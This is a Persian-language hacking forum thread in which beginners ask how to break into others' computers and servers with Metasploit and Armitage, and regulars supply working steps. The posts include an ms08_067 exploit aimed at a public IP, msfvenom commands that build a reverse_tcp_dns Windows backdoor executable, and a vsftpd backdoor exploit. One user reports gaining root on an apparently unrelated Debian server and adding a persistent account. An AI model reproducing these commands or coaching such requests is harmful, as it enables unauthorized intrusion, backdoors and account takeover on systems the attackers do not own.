سلام
من بخواهم ویندوز 7 را بزنم با متااسپلوایت میتونم از ms10_045 اسفاده کنم و پورت30442 اسفاده کنم ولی با این روش باید به یارو ادرسو بدم بره باز کنه
خب اگر یارو دشمنم باشه نخواهم بهش ادرسو بدم باز کنه من باید چی کار کنم؟؟؟؟؟؟؟؟
یاعلی

Muts
01-28-2015, 01:48 AM
من تونستم یوزر و پسورد وایرلس یک نفر را بدست بیارم. می خواستم بدونم ایا میتونم از طریق همین یوزر و پسورد وارد سیستمش بشم یا نه؟
اگه میشه چطوری؟
منتظر کمک شما دوستان هستم
با تشکر
در ضمن من مبتدی هستم لطفا دوستان ساده توضیح دهند
لطفا خصوصی بفرستین
سلام
شما مبتدی هستید که نیاز به مطالعه در زمینه مطالب پایه ای شبکه و غیره دارید
تاپیک های بخش ها رو هم مطالعه کنید به نتیجه نمیرسد(چون مطالب پایه رو کار نکردید)
پیشنهاد میکنم در زمینه شبکه مطالب پایه ای رو بخونید( به دلیل درک حملات و یا ایده ها )

سلام
من بخواهم ویندوز 7 را بزنم با متااسپلوایت میتونم از ms10_045 اسفاده کنم و پورت30442 اسفاده کنم ولی با این روش باید به یارو ادرسو بدم بره باز کنه
خب اگر یارو دشمنم باشه نخواهم بهش ادرسو بدم باز کنه من باید چی کار کنم؟؟؟؟؟؟؟؟
یاعلی

سلام
استفاده از متاسپلویت شرایط داره ، (وجود آسیب پذیری و شرایط فایروال، یا محیط های lab / Real و...)
به نتیجه نمیرسید
اما خوب برای جواب هم مهندسی اجتماعی ...
موفق باشید : - )

GoodBoyHaCkeR
01-28-2015, 10:51 PM
سلام
شما مبتدی هستید که نیاز به مطالعه در زمینه مطالب پایه ای شبکه و غیره دارید
تاپیک های بخش ها رو هم مطالعه کنید به نتیجه نمیرسد(چون مطالب پایه رو کار نکردید)
پیشنهاد میکنم در زمینه شبکه مطالب پایه ای رو بخونید( به دلیل درک حملات و یا ایده ها )


سلام
استفاده از متاسپلویت شرایط داره ، (وجود آسیب پذیری و شرایط فایروال، یا محیط های lab / real و...)
به نتیجه نمیرسید
اما خوب برای جواب هم مهندسی اجتماعی ...
موفق باشید : - )

اساتید متاسفانه مطالب انجمن واقعا سر در گم هست
میخوام متااسپلویت رو کار کنم
ولی آموزش های جالبی واسش تو انجمن نیست که از پایه و اساسی باشه
خیلیام فک کنم این مشکل رو داشته باشن
برای کلاینت هکینگ و کلا مباحث دسترسی و اکسس گرفتن از سیستم تارگت یه تایپیک اختصاصی معرفی کنید که بطور واضح و کامل توضیح داده باشه
الان برای بنده سوال شده
من یه آیپی تارگت دارم و میخوام با متا ازش دسترسی بگیرم ولی نمیدونم از کجا باید شوروع کنم
با rat کار کردم و ازش دسترسی گرفتم سیستم هم برا تست هست و فقط میخوام بدونم چطور باید با متا این کارو کرد
2.3روزه دارم تو انجمن میگردم ولی متاسفانه چیز درست حسابی پیدا نکردم جز سر در گمی
یه آموزش کامل واسه متا از پایه میشه معرفی کنید؟که واقعا جای سوال توش نباشه!وفقط رفع ایرادات جزیی پیگیرش بشید
الان یه سرچ بزنید 1000 نفر راجب این متا پست گذاشتن چون آموزش ها کامل و مفهومی نیست اصلا

Muts
01-29-2015, 02:01 AM
اساتید متاسفانه مطالب انجمن واقعا سر در گم هست
میخوام متااسپلویت رو کار کنم
ولی آموزش های جالبی واسش تو انجمن نیست که از پایه و اساسی باشه
خیلیام فک کنم این مشکل رو داشته باشن
برای کلاینت هکینگ و کلا مباحث دسترسی و اکسس گرفتن از سیستم تارگت یه تایپیک اختصاصی معرفی کنید که بطور واضح و کامل توضیح داده باشه
الان برای بنده سوال شده
من یه آیپی تارگت دارم و میخوام با متا ازش دسترسی بگیرم ولی نمیدونم از کجا باید شوروع کنم
با rat کار کردم و ازش دسترسی گرفتم سیستم هم برا تست هست و فقط میخوام بدونم چطور باید با متا این کارو کرد
2.3روزه دارم تو انجمن میگردم ولی متاسفانه چیز درست حسابی پیدا نکردم جز سر در گمی
یه آموزش کامل واسه متا از پایه میشه معرفی کنید؟که واقعا جای سوال توش نباشه!وفقط رفع ایرادات جزیی پیگیرش بشید
الان یه سرچ بزنید 1000 نفر راجب این متا پست گذاشتن چون آموزش ها کامل و مفهومی نیست اصلا
سلام
پایه رو اگر تموم کردید هدف یادگیری خود کنسولس بذارید مطمئنن بعدش به هدف های بیشتری میرسید
نمونه تاپیک ها
[Only registered and activated users can see links] 8%AA-%D9%88-%D8%AA%D8%B9%D8%A7%D8%B1%DB%8C%D9%81-%D8%A7%D8%A8%D8%AA%D8%AF%D8%A7%DB%8C%DB%8C-%D8%A2%D9%86-%29
و
[Only registered and activated users can see links] B%8C%D8%AA-%D8%A7%D8%B2-%D9%BE%D8%A7%DB%8C%D9%87-lt
ادامه بدید ، سوالی بود همین جا مطرح کنید ...
(یک تاپیک رو تا اخرش ادامه بدید)
موفق باشید

Dr Killer
01-29-2015, 09:53 AM
من تازه نصب کردم میخاستم بدونم الان باید چه فایلی رو باز کنم ک متا اجرا بشه
من ویندوزم 8 هست و منوی استارت ندارم
برای هک کردن سیستم با ای پی از چه روشی پیش برم ممنون

XoDiAK
01-31-2015, 01:04 PM
ناگفته نماند اولش می خوام ارمیتج رو فعال کنم
یه پنجره باز میشه
که ای پی و پورت می خواد
که پیشفرض ای پیش هست
127.0.0.1
من باید دستور
Ifconfig
ای پی بگیرم و اونو جایگزین کنم ؟
یا بذارم همین طوری باشه ؟
برای پورتش باید چیکار کنم ؟

سلام شما اشتباه پیلود رو اتخاب میکنید :)


msfpayload android/meterpreter/reverse_tcp LHOST=ای پی خوتون LPORT=پورت مورد نظر

بعد با استفاده از کنسول انجام بدید سرعت بهتر و راحت تر :)

میتونید به این اموزش هم سر بزنید :

[Only registered and activated users can see links] d.php%3F128271-%25D8%25A2%25D9%2585%25D9%2588%25D8%25B2%25D8%25B4-%25D9%2587%25DA%25A9-%25D8%25A7%25D9%2586%25D8%25AF%25D8%25B1%25D9%2588 %25DB%258C%25D8%25AF-%25D8%25A8%25D8%25A7-%25D9%2585%25D8%25AA%25D8%25A7%25D8%25B3%25D9%25BE %25D9%2584%25D9%2588%25DB%258C%25D8%25AA%2528%25D8 %25A7%25D9%2586%25D8%25AF%25D8%25B1%25D9%2588%25DB %258C%25D8%25AF-%25DB%25B2-%25D8%25AA%25D8%25A7-%25DB%25B4-%25DB%25B4%2529&ei=0KDMVPriJpDXap23gaAH&usg=AFQjCNF9NKX7W3J83KjFeOv1w9W0DjKgWg

ارمیتیج هم زیاد کاری نیست دلتون رو بهش خوش نکنید کنسول خیلی بهتره :)

hayha
01-31-2015, 06:41 PM
اول من این دستور رو میزنم

use exploit/windows/smb/ms08_067_netapi

بعد این دستور

set payload windows/meterpreter/reverse_tcp

بعد این دستور

set RHOST 141.101.118.90

بعد این دستور ای خودم

set LHOST 192.168.1.3

بعد exploit ولی نمیاد

Prot3ct0r
01-31-2015, 06:46 PM
اول من این دستور رو میزنم

use exploit/windows/smb/ms08_067_netapi

بعد این دستور

set payload windows/meterpreter/reverse_tcp

بعد این دستور

set RHOST 141.101.118.90

بعد این دستور ای خودم

set LHOST 192.168.1.3

بعد exploit ولی نمیاد

عزیزم شاید سیستم عاملی که میخواید بهش نفوذ کنید آسیب پذیر نیست !
برای درک بهتر بهتون پیشنهاد میکنم مباحث این تاپیک رو یاد بگیرید:
[Only registered and activated users can see links]

infohooman051
02-01-2015, 12:42 PM
سلام می خوام armitage رو تو کالی اجرا کنم که میزنم وصل شه بعد از پر شدن چیزی نمایش نمیده ببینید :


بعد همین صفحه که پر شد هیچی نمایش داده نمیشه
مشکل از کجاست و چه طوری حل میشه ؟
تو بک ترک قبلا نمایش می داد اما الان نمایش نمی ده
ممکنه از سرعت نت باشه چون من افت سرعت پیدا کردم و دانلودم روی 15 تا هست
مشکل کجاست ؟

BBESTBOYY
02-01-2015, 01:10 PM
سلام می خوام armitage رو تو کالی اجرا کنم که میزنم وصل شه بعد از پر شدن چیزی نمایش نمیده ببینید :


بعد همین صفحه که پر شد هیچی نمایش داده نمیشه
مشکل از کجاست و چه طوری حل میشه ؟
تو بک ترک قبلا نمایش می داد اما الان نمایش نمی ده
ممکنه از سرعت نت باشه چون من افت سرعت پیدا کردم و دانلودم روی 15 تا هست
مشکل کجاست ؟
با سلام
شما اشتباه کردید
مشخصاتی که برای ورود هست رو نباید تغییر بدید شما اومدید آی پی خودتون رو دادی هموون آی پی خودش و مشخصات خودش رو نباید تغییر بدید
موفق باشید

Muts
02-01-2015, 06:14 PM
سلام
چندتا پست اخر که ربطی به تاپیک نداشت و یا دقیقا صفحه قبلی به سوال مشابه شون جواب داده شده بود رو حذف کردم
ابتدا تاپیک های اموزشی بخش رو مطالعه بفرمائید
موفق باشید

mohsen789
02-02-2015, 10:35 AM
سلام.
این مشکل ناشی از چیست؟ start mfs که میزنم خطای زیر میده.

121677 تصویر پیغام خطا

hayha
02-02-2015, 05:23 PM
سلام بچه ها من به تازگی به یک موشکل بر خورد هر چقدر ifconfig در backtrack میزم ایپی نمیاد نمی دونم چرا قبلا میامد

r00tErr0r
02-02-2015, 05:26 PM
سلام.
این مشکل ناشی از چیست؟ start mfs که میزنم خطای زیر میده.

121677 تصویر پیغام خطا

دیتابیس متااسپلویت Postgresql هست ، شما گذاشتین رو mysql

hayha
02-02-2015, 05:26 PM
یکی راهنمای کنه ممنون میشم

infohooman051
02-02-2015, 06:39 PM
سلام من با متا کار کردم و اینطوری بگم جواب داد فقط روی نرم افزار BlueStacks که شبیه ساز هست
روی گوشی خودم که اندروید 4.2 هست اصلا جواب نداد نصب کردم و برنامه رو میزدم اصلا باز نمی شد چیزی نشون نمی داد
اما تو BlueStacks راحت هم زدم دیدم تو کالی زده که یه فایل باز شده که عکسشو می بینید
حالا مشکل از کجاست چرا تو گوشی نمیشه
درضمن من هیچ انتی ندارم رو موبایلم یعنی هیچی ها که بگید باید اف باشه
اینم عکس:
[Only registered and activated users can see links] ([Only registered and activated users can see links])
برم با armitage هم کار کنم تو اونجا هم یه مشکلاتی هست که میگم بهتون

mohsen789
02-03-2015, 06:52 AM
دیتابیس متااسپلویت Postgresql هست ، شما گذاشتین رو mysql

درود.
باز هم پیام خطا داد.

121804

hayha
02-03-2015, 08:46 PM
سلام اقایون میشه یک فیلتر شکن برای backtrack معرفی کنید

MR.B3NY
02-04-2015, 06:28 PM
با سلام خدمت تمامی دوستان عزیز ،

میخواستم بدونم من با داشتن IP و Port ، میتونم از سیستم طرف دسترسی Meterprter یا Shell بدون داشتن
IP Static بگیرم؟

r00tErr0r
02-04-2015, 07:00 PM
با سلام خدمت تمامی دوستان عزیز ،

میخواستم بدونم من با داشتن IP و Port ، میتونم از سیستم طرف دسترسی Meterprter یا Shell بدون داشتن
IP Static بگیرم؟

سلام نه نمی تونید حتمی باید ای پی استاتیک داشته باشین

از طریق وی پی اسم هم میتونین

MR.B3NY
02-04-2015, 07:04 PM
سلام نه نمی تونید حتمی باید ای پی استاتیک داشته باشین

از طریق وی پی اسم هم میتونین

آیپی استاتیک رایگان وجود نداره؟
یا چیزی که بشه باهاش جای* IP Static رو پر کنه؟

Prot3ct0r
02-04-2015, 07:05 PM
با سلام خدمت تمامی دوستان عزیز ،

میخواستم بدونم من با داشتن IP و Port ، میتونم از سیستم طرف دسترسی Meterprter یا Shell بدون داشتن
IP Static بگیرم؟


سلام نه نمی تونید حتمی باید ای پی استاتیک داشته باشین

از طریق وی پی اسم هم میتونین

درود،

شما میتونید از DNS هم استفاده کنید برای اینکار ، علاوه بر اون فقط شما نیازمند Validate ip هستید نه آی پی استاتیک برای شل گرفتن ! در صورتی که آی پی شما استاتیک باشد تنها مشکل موجود این هست که آیپیتون عوض شه دسترسی میپره که با DNS این مشکل حل میشود.


آیپی استاتیک رایگان وجود نداره؟
یا چیزی که بشه باهاش جای* IP Static رو پر کنه؟

خیر باید از isp اتون تهیه کنید.برای پر کردن هم میتونید از DNS استفاده کنید.

در پناه حق.//

Emperor 20
02-05-2015, 02:57 PM
درود،

شما میتونید از dns هم استفاده کنید برای اینکار ، علاوه بر اون فقط شما نیازمند validate ip هستید نه آی پی استاتیک برای شل گرفتن ! در صورتی که آی پی شما استاتیک باشد تنها مشکل موجود این هست که آیپیتون عوض شه دسترسی میپره که با dns این مشکل حل میشود.



ممنون میشم توضیح دهید چه جوری از dns استفاده میشه?

Prot3ct0r
02-05-2015, 03:13 PM
ممنون میشم توضیح دهید چه جوری از dns استفاده میشه?

درود،

شما در meterpreter جای استفاده از reverse_tcp باید از reverse_tcp_dns استفاده کنید.

در پناه حق.//

prohackerkhafan
02-05-2015, 05:43 PM
سلام
کسی میدونه که با آی پی یه نفر از راه دور با بک ترک چطور میشه هکش کرد؟
بدون هیچ گونه برقراری ارتباط
لطفاً هر کی میدونه آموزش بده
با تشکر

Prot3ct0r
02-05-2015, 06:28 PM
سلام
کسی میدونه که با آی پی یه نفر از راه دور با بک ترک چطور میشه هکش کرد؟
بدون هیچ گونه برقراری ارتباط
لطفاً هر کی میدونه آموزش بده
با تشکر

درود،

دوست گلم زمانی شما میتونید با داشتن آی پی شخصی رو به اصطلاح "هک" کنید که یک برنامه آسیب پذیر روی اون در حال اجرا باشه! برای پیدا کردنش هم میتونید از Armitage استفاده میکنید تا یک سری از اکسپلویت هایی که به هدف شما میخوره رو برای شما به نمایش میاره ... برای اطلاعات بیشتر تاپیک زیر رو ببینید:

[Only registered and activated users can see links]آموزش-متااسپلویت-از-پایه-lt
[Only registered and activated users can see links](اموزش-راه-اندازی-متاسپلویت-و-تعاریف-ابتدایی-آن-)
[Only registered and activated users can see links]اموزش-Metasploit-Penetration-Testing

MR.B3NY
02-06-2015, 09:37 PM
با سلام خدمت تمامی دوستان عزیز

من هرکاری میکنم روی کالی لینوکس نمیتونم کار هایی که در فیلم دوست عزیزمون که درباره ی DNS On MEtasploit Backdoor توضیح داده شده رو انجام بدم !

اروری که میده : ( هنگام زدن msfvenom -p ...... )

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
The following options failed to validate: LPORT.


( از Setting Vmware هم Nat رو تغییر دادم ... بازم نشد )

ممنون میشم کمکم کنید :-s

Prot3ct0r
02-06-2015, 10:15 PM
با سلام خدمت تمامی دوستان عزیز

من هرکاری میکنم روی کالی لینوکس نمیتونم کار هایی که در فیلم دوست عزیزمون که درباره ی DNS On MEtasploit Backdoor توضیح داده شده رو انجام بدم !

اروری که میده : ( هنگام زدن msfvenom -p ...... )

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
The following options failed to validate: LPORT.


( از Setting Vmware هم Nat رو تغییر دادم ... بازم نشد )

ممنون میشم کمکم کنید :-s

درود،

در بک ترک بدون مشکل کار میکنه فیلم هم مشاهده کردید در بک ترک ضبط شده و مشکلی نداره ... اما درباره رفع 2 ارور 2 ورودی دیگه به دستورتون باید اضافه کنید به نام های :

1. platform
2. arch

که در نهایت دستور شما میشه :



msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=yourhost LPORT=1111 -f exe -a x86 --platform windows > file.exe


توجه داشته باشید که شما میتونید از encode هم استفاده کنید ... لازم به ذکر است که دستور اولیه هم بزنید بدون مشکل کار میکنه اما برای آشنایی بیشتر درباره پارامتر های اضافه شده به ابزار msfvenom در کالی لینوکس تحقیق کنید.

تست دستور در 2 نوع سیستم عامل:

-- کالی لینوکس:



[email protected]:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=DNS LPORT=1111 -f exe --platform windows -a x86 > file.exe
Found 0 compatible encoders
[email protected]:~/Desktop#

-- بک ترک:



[email protected]:~# msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST=DNS LPORT=1111 -f exe > file.exe
[email protected]:~#



در پناه حق.//

generalha
02-06-2015, 11:08 PM
سلام من ای پی سرور یک سایت رو armitage زدم اوردش بعد عکس زیر بود.
الان من با این چی کار کنم
[Only registered and activated users can see links]
اسمشم sony embedded هست ایا همچین چیزی رو هم میشه هک کرد ؟؟؟؟؟؟؟؟

r00tErr0r
02-06-2015, 11:47 PM
سلام من ای پی سرور یک سایت رو armitage زدم اوردش بعد عکس زیر بود.
الان من با این چی کار کنم
[Only registered and activated users can see links]
اسمشم sony embedded هست ایا همچین چیزی رو هم میشه هک کرد ؟؟؟؟؟؟؟؟

سلام ای پی سرور رو اسکن کردین ؟ عکس پرینتره :|

خب بعد اسکن شما روی تارگت کلیک راست کن و گزینه service رو بزن اگه اسکن به درستی پیشرفته باشه شما میتونید نوع سرور و پورت های باز و ... رو مشاهده کنید و در این صورت از گزینه attack میتونید حمله خود رو شروع کنید
attack port و attack vlun گذینه های هست که پیشه رو دارید ، خیلی کم پیش میاد که بتونید با ارمیتیج سرور رو مستقیم مو نفوذ قرار بدید معمولا اسیب پذیری های http و ftp و یا mysql هست که میتونید استفاده کنید البته به سیستم عامل سرور هم بستگی داره

generalha
02-07-2015, 04:16 PM
راستیتش ای پی سایت
[Only registered and activated users can see links] هست :73:

MR.B3NY
02-07-2015, 06:08 PM
با سلام خدمت تمامی دوستان عزیز :-x

سوال دیگه ای برام بوجود اومد درباره ی آموزشی که دوستمون دادن ...

من در این قسمت مشکل پیدا کردم :

cp FileName.exe /var/[Only registered and activated users can see links]

این قسمت انجام میشه ، ولی طبق فیلم جلو میرم ، فایل رو از روی IP پیدا نمیکنه
در اصل ، Unable To Connect میده

چه کاری باید انجام بدم؟

r00tErr0r
02-07-2015, 06:29 PM
با سلام خدمت تمامی دوستان عزیز :-x

سوال دیگه ای برام بوجود اومد درباره ی آموزشی که دوستمون دادن ...

من در این قسمت مشکل پیدا کردم :

cp FileName.exe /var/[Only registered and activated users can see links]

این قسمت انجام میشه ، ولی طبق فیلم جلو میرم ، فایل رو از روی IP پیدا نمیکنه
در اصل ، Unable To Connect میده

چه کاری باید انجام بدم؟

تو کدوم تایپیک ؟

MR.B3NY
02-07-2015, 06:42 PM
تو کدوم تایپیک ؟

در 2تا تاپیک بالاتر ، لینک بود دوست عزیز

Click Here ([Only registered and activated users can see links])
------------------------------------------
سوالم رو دوباره مطرح میکنم ( جواب لطفا )

با سلام خدمت تمامی دوستان عزیز :-x

سوال دیگه ای برام بوجود اومد درباره ی آموزشی که دوستمون دادن ...

من در این قسمت مشکل پیدا کردم :

cp FileName.exe /var/[Only registered and activated users can see links]

این قسمت انجام میشه ، ولی طبق فیلم جلو میرم ، فایل رو از روی IP پیدا نمیکنه
در اصل ، Unable To Connect میده

چه کاری باید انجام بدم؟

r00tErr0r
02-07-2015, 06:57 PM
خب این دستور که فایل بک دور کپی میکنه تو دایرکتوری زیر /var/[Only registered and activated users can see links] که لوکال هاستتون هست

منظورتون این که فایل را از روی ای پی پیدا نمیکنه چی هست ؟
حتمی فایل کپی نشده تو اون دایرکتوری که پیدا نمیکنه میتونید به صورت دستی کپی کنید دوست عزیز

Prot3ct0r
02-07-2015, 08:11 PM
در 2تا تاپیک بالاتر ، لینک بود دوست عزیز

Click Here ([Only registered and activated users can see links])
------------------------------------------
سوالم رو دوباره مطرح میکنم ( جواب لطفا )

با سلام خدمت تمامی دوستان عزیز :-x

سوال دیگه ای برام بوجود اومد درباره ی آموزشی که دوستمون دادن ...

من در این قسمت مشکل پیدا کردم :

cp FileName.exe /var/[Only registered and activated users can see links]

این قسمت انجام میشه ، ولی طبق فیلم جلو میرم ، فایل رو از روی IP پیدا نمیکنه
در اصل ، Unable To Connect میده

چه کاری باید انجام بدم؟

درود،

بنده گفتم این آموزش ، آموزش کاملی هست شما لازم نیست تمام مراحل رو انجام بدید بر اساس نیازتون باید مراحل مهم رو انجام بدید ، دوست عزیزمون هم توضیح دادند که باید روی لوکال هاستتون کپی کنید برای دسترسی راحت تر که میتونید جای اینکار اگر از vmware workstation استفاده میکنید درایوی به اشتراک بگذارید یا با Drag And Drop اینکارو انجام بدید ( vmware tools باید نصب باشه ) برای دسترسی از لوکال پس از فعال کردن سرویس آپاچی میتونید توی سیستم مجازی با آدرس localhost و در سیستم اصلی با آدرس آی پی ماشین مجازی دسترسی داشته باشید.
در پناه حق.//

GoodBoyHaCkeR
02-08-2015, 02:17 PM
دوستان من برا تست میخوام به ویندوز خودم نفوذ کنم
رو vm کالی رو بالا میارم
ویندوز اصلیمم سون هست 32بیت
چطور میتونم این کارو انجام بدم با متا؟

Prot3ct0r
02-08-2015, 02:25 PM
دوستان من برا تست میخوام به ویندوز خودم نفوذ کنم
رو vm کالی رو بالا میارم
ویندوز اصلیمم سون هست 32بیت
چطور میتونم این کارو انجام بدم با متا؟

درود،

نفوذ با متاسپلویت در 2 حالت امکان پذیر میباشد.

1. Payload ای رو در قالب یک فایل ( تروجان ) به قربانی بدید و اجرا کند.
2. سرویسی در قربانی آسیب پذیر باشه و با اکسپلویت ها به اون نفوذ کنید.

آموزش های هر 2 روش در بخش هست میتونید ازشون استفاده کنید.

نمونه ها :

[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]


در پناه حق.//

GoodBoyHaCkeR
02-08-2015, 02:32 PM
درود،

نفوذ با متاسپلویت در 2 حالت امکان پذیر میباشد.

1. Payload ای رو در قالب یک فایل ( تروجان ) به قربانی بدید و اجرا کند.
2. سرویسی در قربانی آسیب پذیر باشه و با اکسپلویت ها به اون نفوذ کنید.

آموزش های هر 2 روش در بخش هست میتونید ازشون استفاده کنید.

نمونه ها :

[Only registered and activated users can see links]
[Only registered and activated users can see links]
[Only registered and activated users can see links]


در پناه حق.//

روش یک رو اگه بخوام اجرا کنم خب rat خیلی بهتر جواب میده
روش دوم رو میخوام اجرا کنم
از کجا میتونم آسیب پذیری سیستم رو تشخیض بدم؟
عرض کردم میخوام به سیستم خودم نفوذ کنم واسه تست
میتونید بصورت متنی بگید اخه از تصویری چیزی دستگیرم نشد
خیلی دانلود کردم متاسفانه نتونستم درک کنم
ممنون میشم بگین

Prot3ct0r
02-08-2015, 02:46 PM
روش یک رو اگه بخوام اجرا کنم خب rat خیلی بهتر جواب میده
روش دوم رو میخوام اجرا کنم
از کجا میتونم آسیب پذیری سیستم رو تشخیض بدم؟
عرض کردم میخوام به سیستم خودم نفوذ کنم واسه تست
میتونید بصورت متنی بگید اخه از تصویری چیزی دستگیرم نشد
خیلی دانلود کردم متاسفانه نتونستم درک کنم
ممنون میشم بگین

دوست عزیز در بالا گفتم که باید یک سرویس آسیب پذیر در حال اجرا باشه برای مثال شما توی سایت های ثبت اکسپلویت چرخ بزنید بعد برای مثال برای نسخه ای از ویندوز آسیب پذیری ای رو پیدا میکنید بعد میتونید با اون اکسپلویت بهش نفوذ کنید.

برای چک کردن اکسپلویت ها هم میتونید از نسخه گرافیکی Metasploit یعنی Armitage استفاده کنید.

موفق باشید

parsa_91
02-10-2015, 02:03 PM
سلام. با اکسپلویت vsftpd_234_backdoor چکار میشه کرد؟؟
من چند تا سرور رو اسکن کردم. اکثرن پورت 21 بازه. و رو بعضی هاشون این اکسپلویت درسترسی میده و مینویسه بعد از 15 دقیقه دیسکانتکت میشه.
بخوام این سرور رو هک کنم چکار باید کنم؟
نیاز به کرک اف تی پی هست وقتی این دسترسی رو میده؟

Prot3ct0r
02-10-2015, 02:39 PM
سلام. با اکسپلویت vsftpd_234_backdoor چکار میشه کرد؟؟
من چند تا سرور رو اسکن کردم. اکثرن پورت 21 بازه. و رو بعضی هاشون این اکسپلویت درسترسی میده و مینویسه بعد از 15 دقیقه دیسکانتکت میشه.
بخوام این سرور رو هک کنم چکار باید کنم؟
نیاز به کرک اف تی پی هست وقتی این دسترسی رو میده؟

درود،

بله در صورتی که این آسیب پذیری وجود داشته باشه شما نیازی به کرک ندارید.

منظورتون چیه که بعد از مدتی دیسکانکت میشه؟ یعنی شما دسترسی میگیرید و دسترسی اتون حذف میشه؟ اطلاعات بیشتر بدید.

parsa_91
02-10-2015, 03:32 PM
درود،

بله در صورتی که این آسیب پذیری وجود داشته باشه شما نیازی به کرک ندارید.

منظورتون چیه که بعد از مدتی دیسکانکت میشه؟ یعنی شما دسترسی میگیرید و دسترسی اتون حذف میشه؟ اطلاعات بیشتر بدید.

وقتی میزنم از این اکسپلویت استفاده کنه. بعد از اجرای دستور اکسوپلویت پیام خوشامد گویی میده . اخرش میگه بعد از 15 دقیقه دیسکانکت میشه
پیامی مثل این عکس
[Only registered and activated users can see links]

لطفا راهنمایی کنید در مرحله بعد ک این پیغام اومد چکار باید کنم تا دسترسی بگیرم و یوزر بسازم. سرور لینوکس هست و با کالی خودم کار میکنم

Prot3ct0r
02-10-2015, 03:37 PM
وقتی میزنم از این اکسپلویت استفاده کنه. بعد از اجرای دستور اکسوپلویت پیام خوشامد گویی میده . اخرش میگه بعد از 15 دقیقه دیسکانکت میشه
پیامی مثل این عکس
[Only registered and activated users can see links]

لطفا راهنمایی کنید در مرحله بعد ک این پیغام اومد چکار باید کنم تا دسترسی بگیرم و یوزر بسازم. سرور لینوکس هست و با کالی خودم کار میکنم

عزیزم طبق این تصویری که دادید شما با telnet وصل شدید از اکسپلویت آسیب پذیری استفاده نکردید!

ابتدا اکسپلویت vsftpd_234_backdoor در متاسپلویت خودتون رو انتخاب کنید.

تنظیمات مربوط به اکسپلویت رو انجام بدید و در نهایت در صورت آسیب پذیر بودن هدف شما میتونید دسترسی root داشته باشید.

در صورتی ام که دسترسی بگیرید میتونید این محدودیت ها رو تنظیم کنید...

موفق باشید

parsa_91
02-10-2015, 03:41 PM
عزیزم طبق این تصویری که دادید شما با telnet وصل شدید از اکسپلویت آسیب پذیری استفاده نکردید!

در متاسپلویت خودتون رو انتخاب کنید.

تنظیمات مربوط به اکسپلویت رو انجام بدید و در نهایت در صورت آسیب پذیر بودن هدف شما میتونید دسترسی root داشته باشید.

موفق باشید
این عکس رو برای مثال از ی سایتی اوردم. وقتی از اون اکسپلویت استفاده ممیکنم. پیغامی مثل عکس میده.
وقتی دستوری مثل adduser pm میدم که یوزر بسازه مینویسه» exec: adduser pm
این برای چی هست؟؟
میشه راهنمایی کنید دقیق تر که چکاری بکنم؟
و اینکه از ارمیتج استفاده میکنم. یسیری تنظیماتو خودش انجام میده

Prot3ct0r
02-10-2015, 03:44 PM
این عکس رو برای مثال از ی سایتی اوردم. وقتی از اون اکسپلویت استفاده ممیکنم. پیغامی مثل عکس میده.
وقتی دستوری مثل adduser pm میدم که یوزر بسازه مینویسه» exec: adduser pm
این برای چی هست؟؟
میشه راهنمایی کنید دقیق تر که چکاری بکنم؟
و اینکه از ارمیتج استفاده میکنم. یسیری تنظیماتو خودش انجام میده

شما ابتدا دستور id رو بزنید ببینید آیا دسترسی root دارید یا خیر بعلاوه من با آرمیتیج برای اینکار استفاده نکردم اما احتمالا اگر اروری نداره یوزر رو ساخته چک کنید که آیا ساخته یا خیر ...

parsa_91
02-10-2015, 03:48 PM
شما ابتدا دستور id رو بزنید ببینید آیا دسترسی root دارید یا خیر بعلاوه من با آرمیتیج برای اینکار استفاده نکردم اما احتمالا اگر اروری نداره یوزر رو ساخته چک کنید که آیا ساخته یا خیر ...

الان که تست زدم این پیغام روو داد:

Exploit running as background job.
Banner: 220 ProFTPD 1.3.4a Server (Debian) [::ffff:110.110.110.110]
USER: 331 Password required for aQTU:)

و وقتی ای دی رو زدم:

msf exploit(vsftpd_234_backdoor) > id
exec: id

uid=0(root) gid=0(root) groups=0(root)

یعنی الان دسترسی روت دارم؟؟
حالا باید یوزر بسازم؟


msf exploit(vsftpd_234_backdoor) > useradd -m pm
exec: useradd -m pm

msf exploit(vsftpd_234_backdoor) > passwd pm
exec: passwd pm


الان ساخته؟

msf exploit(vsftpd_234_backdoor) > egrep -i "^pm" /etc/passwd
exec: egrep -i "^pm" /etc/passwd

pm: x :1000:1001::/home/pm:/bin/sh

Prot3ct0r
02-10-2015, 04:17 PM
الان که تست زدم این پیغام روو داد:


و وقتی ای دی رو زدم:


یعنی الان دسترسی روت دارم؟؟
حالا باید یوزر بسازم؟



الان ساخته؟

بله عزیزم ساخته ..
موفق باشید

parsa_91
02-10-2015, 07:19 PM
بله عزیزم ساخته ..
موفق باشید

شرمنده یه سوالی برام پیش اومده. من وقتی تو کتسول ارمیتج که زدم ریبوت به جای اینکه تارگت ریبوت بشه سیستم خودم ریبوت شد... نکنه ارمیتج درست نصب نشده بجای سیستم تارگت دارم روی سیستم خود کار میکنم؟

ولی چرا ای پی های مختلف رو ک چک میکنم اسکن میکنه و چیزای متفاوتی برام میاره از اکسپلویتاش
؟

و برای استفاده از متاسپلویت نیاز به ایپی استاتیک دارم؟؟؟؟
اگه اره هیچ راهی برای دور زدن این قضیه نیست؟

Prot3ct0r
02-10-2015, 07:23 PM
شرمنده یه سوالی برام پیش اومده. من وقتی تو کتسول ارمیتج که زدم ریبوت به جای اینکه تارگت ریبوت بشه سیستم خودم ریبوت شد... نکنه ارمیتج درست نصب نشده بجای سیستم تارگت دارم روی سیستم خود کار میکنم؟

ولی چرا ای پی های مختلف رو ک چک میکنم اسکن میکنه و چیزای متفاوتی برام میاره از اکسپلویتاش
؟

آرمیتیج به اصطلاح نسخه گرافیکی metasploit میباشد حتما شما توی کنسول metasploit زدید reboot نه توی دسترسی ای که گرفتید.

آرمیتیج یک تارگتی که به اصطلاح UP باشه رو اکسپلویت هایی رو روش تست میکنه با چک کردن این اکسپلویت ها روی تارگت به شما میگه این تارگت شما قابلیت استفاده از این اکسپلویت ها رو داره و یکی از مزیت های مهم آرمیتیج همین میباشد.

موفق باشید

--- ویرایش ---


و برای استفاده از متاسپلویت نیاز به ایپی استاتیک دارم؟؟؟؟
اگه اره هیچ راهی برای دور زدن این قضیه نیست؟

میتونید از آموزش Use DNS on metasploit backdoor که در امضام هست استفاده کنید.

parsa_91
